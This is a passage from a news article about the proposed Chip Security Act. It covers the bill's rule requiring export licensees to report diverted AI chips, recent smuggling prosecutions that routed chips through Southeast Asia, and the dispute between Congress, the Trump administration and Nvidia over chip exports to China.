The bill also requires any person who received a license to export a covered chip to promptly report to the Under Secretary of Industry and Security if they obtain credible information that the product has been diverted to an unauthorized end-user or location. Mandatory reporting closes a gap that currently allows diversion to go unreported until investigators stumble across it independently — sometimes years after the fact.

The bill arrives with enforcement urgency already established on its behalf. Earlier this week, the Justice Department charged three individuals for conspiring to smuggle billions of dollars' worth of advanced AI chips to China through Thailand.
In November 2025, the DOJ had also indicted three Chinese nationals for smuggling high-tech chips through Thailand and Malaysia to China. Both cases used the trans-shipment model — routing restricted chips through a third country to obscure China as the final destination — demonstrating that existing export controls fail at the physical enforcement layer precisely where location verification would apply.

The broader legislative push sits in deliberate tension with the Trump administration. The White House AI czar, David Sacks, in January retweeted criticism of the Chip Security Act, suggesting it handicaps Trump's ability to strategically position the U.S. favorably against China. House Foreign Affairs Committee Chairman Brian Mast pushed back directly, saying the talking points amplified by Sacks matched those he had heard from Nvidia. Nvidia CEO Jensen Huang has repeatedly argued to lawmakers that U.S. chip sales to China entrench American technology as the global standard — a position congressional China hawks view as commercially motivated reasoning that ignores military end-use risk.

The Trump administration approved the export of higher-tier H200 chips to China in January 2026, walking back the previous administration's blanket restrictions. That decision prompted fierce backlash on Capitol Hill, where lawmakers have been seeking congressional control over export licensing — authority that currently belongs entirely to the Department of Commerce. The Chip Security Act represents Congress's attempt to build a verification infrastructure capable of surviving executive policy oscillations by embedding accountability into the hardware itself rather than relying solely on licensing decisions made at the administrative level.

Industry groups including the Information Technology and Innovation Council have warned that a government chip-tracking mandate creates the impression of deepening U.S. government control over the American AI stack, potentially pushing countries that should be core customers toward alternative suppliers. Whether that concern outweighs the demonstrated reality of $170 million AI chip smuggling conspiracies routed through Southeast Asian shell companies is now a question for the full House floor.